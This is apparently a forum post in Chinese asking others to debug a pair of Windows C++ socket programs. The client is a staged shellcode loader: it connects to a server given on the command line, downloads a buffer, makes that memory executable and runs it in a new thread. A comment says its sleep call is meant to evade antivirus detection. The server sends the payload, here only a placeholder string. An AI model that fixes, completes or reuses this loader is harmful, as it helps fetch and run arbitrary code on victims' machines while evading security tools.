客户端和服务端的实现问题
客户端程序代码:
#include <stdio.h> #include <iostream> #include <WinSock2.h> #pragma comment(lib, "ws2_32.lib") //添加ws2_32动态库 #pragma warning(disable:4996) //忽略旧函数使用的警告 using namespace std; int main(int argc, char *argv[]) { const int BUF_SIZE = 1024; WSADATA wsd; //WSADATA变量 SOCKET sHost; // 服务器套接字socket SOCKADDR_IN servAddr; //服务器地址 char buf[BUF_SIZE]; // 存放发送的数据缓冲区 char bufRecv[BUF_SIZE]; //接收收到的数据缓冲区 DWORD dwThreadId; HANDLE hThread; DWORD dwOldProtect; int retVal; // 返回值 if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) //初始化套结字动态库 { cout << "WSAStartup failed!" << endl; return -1; } sHost = socket(AF_INET, SOCK_STREAM, 0); //创建套接字 IPV4 可靠的,双向的类型服务提供商选择 if (INVALID_SOCKET == sHost) { cout << "socket failed!" << endl; WSACleanup(); return -1; } //设置服务器的地址 servAddr.sin_family = AF_INET; //指定IPV4 servAddr.sin_addr.s_addr = inet_addr(argv[1]); // 指定服务器的地址 servAddr.sin_port = htons((short)atoi(argv[2])); // 指定服务器的端口 retVal = connect(sHost, (LPSOCKADDR)&servAddr, sizeof(servAddr)); // 套接字 sockaddr的指针,也就是地址 第三个参数为SOCKADDR_IN结构体的大小 if (SOCKET_ERROR == retVal) //判断是否连接成功 { cout << "connect failed!" << endl; closesocket(sHost); WSACleanup(); return -1; } ZeroMemory(buf, BUF_SIZE); // buf指向的地址用0来填充 strcpy(buf, "ok"); //给ok两个字节的字符串复制给buf retVal = send(sHost, buf, strlen(buf), 0); //send的返回值 if (SOCKET_ERROR == retVal) //判断是否发送成功 { cout << "send failed!" << endl; closesocket(sHost); WSACleanup(); return -1; } cout << "Starting Download Payload" << endl; ZeroMemory(bufRecv, BUF_SIZE); // bufRevc指向的地址用0来填充 Sleep(2000); //延迟两秒起到免杀绕过的效果 cout << "Downloading." << endl; recv(sHost, bufRecv, BUF_SIZE, 0); //bufRecv缓冲区接收 服务端发送来的数据 cout << "OK." << endl; Sleep(4000); closesocket(sHost); WSACleanup(); cout << "Start Load Shellcode" << endl; //下面就是开辟内存存储shellcode 创建线程进行执行 char * shellcode = (char *)VirtualAlloc( NULL, BUF_SIZE, MEM_COMMIT, PAGE_READWRITE // 只申请可读可写 ); CopyMemory(shellcode, bufRecv, BUF_SIZE); VirtualProtect(shellcode, BUF_SIZE, PAGE_EXECUTE, &dwOldProtect); // VirtualProtect改变它的属性 -> 可执行 hThread = CreateThread( NULL, // 安全描述符 NULL, // 栈的大小 (LPTHREAD_START_ROUTINE)shellcode, // 函数 NULL, // 参数 NULL, // 线程标志 &dwThreadId // 线程ID ); WaitForSingleObject(hThread, INFINITE); return 0; }
服务端
程序代码:
#include "winsock2.h" #pragma comment(lib, "ws2_32.lib") #include <iostream> using namespace std; int main(int argc, char* argv[]) { const int BUF_SIZE = 1024; WSADATA wsd; //WSADATA变量 SOCKET sServer; //服务器套接字 SOCKET sClient; //客户端套接字 SOCKADDR_IN addrServ;; //服务器地址 char buf[BUF_SIZE]; //接收数据缓冲区 char sendBuf[] = "shellcode"; int retVal; //返回值 if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)//初始化套结字动态库 { cout << "WSAStartup failed!" << endl; return 1; } //创建套接字 sServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (INVALID_SOCKET == sServer) { cout << "Socket Failed!" << endl; WSACleanup();//释放套接字资源; return -1; } //服务器套接字地址 addrServ.sin_family = AF_INET; addrServ.sin_port = htons((short)atoi(argv[1]));; addrServ.sin_addr.s_addr = INADDR_ANY; //绑定套接字 retVal = bind(sServer, (LPSOCKADDR)&addrServ, sizeof(SOCKADDR_IN)); if (SOCKET_ERROR == retVal) { cout << "Bind Failed!" << endl; closesocket(sServer); //关闭套接字 WSACleanup(); //释放套接字资源; return -1; } //开始监听 retVal = listen(sServer, 1); if (SOCKET_ERROR == retVal) { cout << "Listen Failed!" << endl; closesocket(sServer); //关闭套接字 WSACleanup(); //释放套接字资源; return -1; } cout << "开始监听中...." << endl; //接受客户端请求 sockaddr_in addrClient; int addrClientlen = sizeof(addrClient); sClient = accept(sServer, (sockaddr FAR*)&addrClient, &addrClientlen); if (INVALID_SOCKET == sClient) { cout << "Accept Failed!" << endl; closesocket(sServer); //关闭套接字 WSACleanup(); //释放套接字资源; return -1; } //int flag = 1; //只接收一次 while (true) { //接收客户端数据 ZeroMemory(buf, BUF_SIZE); // 填充为0 防止内存分配发生意外 retVal = recv(sClient, buf, BUF_SIZE, 0); // 接收数据放在buf缓冲区 if (SOCKET_ERROR == retVal) //判断是否接收错误 { cout << "Recv Failed!" << endl; closesocket(sServer); //关闭套接字 closesocket(sClient); //关闭套接字 WSACleanup(); //释放套接字资源; return -1; } if (buf[0] == '0') break; cout << "成功建立通信" << endl; cout << "向客户端发送shellcode: " << sendBuf << endl; retVal = send(sClient, sendBuf, (int)strlen(sendBuf), 0); if (retVal == SOCKET_ERROR) { cout << "send fail" << endl; } cout << "发送shellcode成功!" << endl; //flag = 0; } //退出 closesocket(sServer); //关闭套接字 closesocket(sClient); //关闭套接字 WSACleanup(); //释放套接字资源; return 0; }
问题:发现客户端接收到了服务端发送的数据之后不会进行执行,客户端的实现是没有问题的,就想大家帮忙看下服务端的实现有没有问题
[此贴子已经被作者于2020-1-10 00:16编辑过]